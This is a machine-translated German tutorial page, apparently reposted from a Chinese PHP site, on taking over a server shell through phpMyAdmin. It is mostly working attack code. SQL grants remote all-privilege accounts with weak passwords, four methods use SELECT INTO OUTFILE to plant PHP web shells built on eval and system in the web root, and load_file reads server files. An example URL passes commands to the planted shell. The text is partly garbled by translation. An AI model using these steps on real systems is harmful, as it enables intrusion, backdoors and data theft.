Heim > Artikel > Datenbank > Zusammenfassung PHPmyadmin übernimmt die Shell

Zusammenfassung PHPmyadmin übernimmt die Shell

藏色散人nach vorne: 2021-01-04 14:37:481970Durchsuche

Das Folgende ist in der Spalte phpmyadmin-Nutzungsanleitung zusammengefasstphpmyadminHolen Sie sich die Shell, ich hoffe, sie wird Freunden in Not helfen! ° Benutzer „guessec“ Das Passwort lautet ooxx und erlaubt externe Verbindungen.

GRANT ALL PRIVILEGES ON *.* TO &#39;guetsec&#39;@&#39;%&#39; IDENTIFIED BY &#39;ooxx&#39; WITH GRANT OPTION;

Wir können ein Root-Konto erstellen und ein Passwort festlegen. Zusammenfassung PHPmyadmin übernimmt die Shell

GRANT ALL PRIVILEGES ON *.* TO &#39;root&#39;@&#39;%&#39; IDENTIFIED BY &#39;123456&#39; WITH GRANT OPTION;

Vier klassische Methoden zur Verwendung von Shell:

Methode eins:

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES (&#39;<?php @eval_r($_POST[7on])?>&#39;);
SELECT 7onFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;
----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
    一句话连接密码：7on

Methode 2:

读取文件内容：    select load_file(&#39;E:/xamp/www/s.php&#39;);
写一句话：    select &#39;<?php @eval_r($_POST[cmd])?>&#39;INTO OUTFILE &#39;E:/xamp/www/study.php&#39;
cmd执行权限：    select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;

\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

Methode 3:

JhackJ-Version PHPmyadmin erhält Shell

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES(&#39;<?php eval_r($_POST[cmd])?>&#39;);
select cmd from study into outfile &#39;E:/wamp/www/7.php&#39;;
   
Drop TABLE IF EXISTS study;
   
<?php eval_r($_POST[cmd])?>
--------------------------------------------------------------------------------
<?php @eval_r($_POST[cmd])?>
   
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES (&#39;<?php eval_r($_POST[cmd])?>&#39;);# 影响列数： 1
SELECT cmdFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;# 影响列数： 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。

Methode 4:

select load_file(&#39;E:/xamp/www/study.php&#39;);
select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;

\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

Dann besuchen Sie uns das Website-Verzeichnis: http:// www.2cto.com /study.php?cmd=dir

Phpmyadmin erscheint beim Exportieren eines Satzes (Fehlercode: 13 – Berechtigung verweigert)

Das bedeutet, dass für dieses Verzeichnis keine Berechtigung vorliegt . Sie können das Verzeichnis der oberen oder unteren Ebene ausprobieren

Das obige ist der detaillierte Inhalt vonZusammenfassung PHPmyadmin übernimmt die Shell. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Stellungnahme：

Dieser Artikel ist reproduziert unter:cnblogs.com. Bei Verstößen wenden Sie sich bitte an admin@php.cn löschen

Vorheriger Artikel：Über phpmyadmin neue Haltung getshellNächster Artikel：Über phpmyadmin neue Haltung getshell

In Verbindung stehende Artikel

Mehr sehen